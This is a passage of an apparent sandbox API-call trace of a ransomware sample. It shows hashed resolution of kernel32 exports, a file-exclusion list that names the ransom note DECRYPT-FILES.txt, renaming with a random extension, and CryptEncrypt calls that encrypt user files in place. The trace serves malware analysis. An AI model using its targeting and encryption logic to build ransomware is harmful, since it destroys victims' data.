lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.261] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.261] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.261] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.261] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.261] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.261] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.261] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.261] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.261] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.261] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.261] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.261] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.261] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.261] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.261] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.261] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.261] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.262] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.262] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.262] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.262] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.262] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.262] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.262] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.262] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.262] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.262] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.262] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.262] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.262] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.262] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.262] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.262] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.262] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.263] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.263] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 74 [0082.263] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK") returned 79 [0082.263] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.axnk"), dwFlags=0x0) returned 1 [0082.263] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.263] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.264] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.264] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 0 [0082.264] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0082.264] CloseHandle (hObject=0x448) returned 1 [0082.264] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0082.264] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0082.264] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.265] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0082.265] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0082.265] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0082.265] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0082.265] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0082.265] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.265] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" [0082.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\jkbimi8.tmp" [0082.265] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.265] CloseHandle (hObject=0x0) returned 0 [0082.265] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.265] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0082.265] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0082.266] CloseHandle (hObject=0x440) returned 1 [0082.266] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6416bc0, ftCreationTime.dwHighDateTime=0x1d4c893, ftLastAccessTime.dwLowDateTime=0x7bcf2b80, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0x7bcf2b80, ftLastWriteTime.dwHighDateTime=0x1d4d558, nFileSizeHigh=0x0, nFileSizeLow=0x14acf, dwReserved0=0x0, dwReserved1=0x0, cFileName="MW_4G5Sx P7wGze.gif", cAlternateFileName="MW_4G5~1.GIF")) returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="autorun.inf") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="boot.ini") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="desktop.ini") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="ntuser.dat") returned -1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="iconcache.db") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="bootsect.bak") returned 1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="ntuser.dat.log") returned -1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="thumbs.db") returned -1 [0082.266] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif", lpString2="Bootfont.bin") returned 1 [0082.266] lstrlenW (lpString="MW_4G5Sx P7wGze.gif") returned 19 [0082.266] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0082.266] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0082.266] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0082.266] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0082.266] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.266] lstrlenW (lpString="MW_4G5Sx P7wGze.gif") returned 19 [0082.266] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.266] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="MW_4G5Sx P7wGze.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif" [0082.266] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mw_4g5sx p7wgze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.267] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=84687) returned 1 [0082.267] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.267] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.267] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.267] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.267] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.267] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.268] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.269] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.269] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.270] CloseHandle (hObject=0x444) returned 1 [0082.270] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.270] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.272] CloseHandle (hObject=0x0) returned 0 [0082.272] CloseHandle (hObject=0x440) returned 1 [0082.273] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.273] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.273] GetTickCount () returned 0x114d0b8 [0082.273] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.274] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.274] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.274] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.274] lstrlenA (lpString="kernel32.dll") returned 12 [0082.274] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.274] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.275] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.275] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.275] lstrlenA (lpString="ADDATOMA") returned 8 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.275] lstrlenA (lpString="ADDATOMW") returned 8 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.275] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.275] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.275] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.275] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.275] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.275] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.275] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.275] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.275] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.275] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.275] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.275] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.275] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.275] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.276] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.276] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.276] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.276] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.276] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.276] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.276] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.276] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.276] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.276] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.276] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.276] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.276] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, 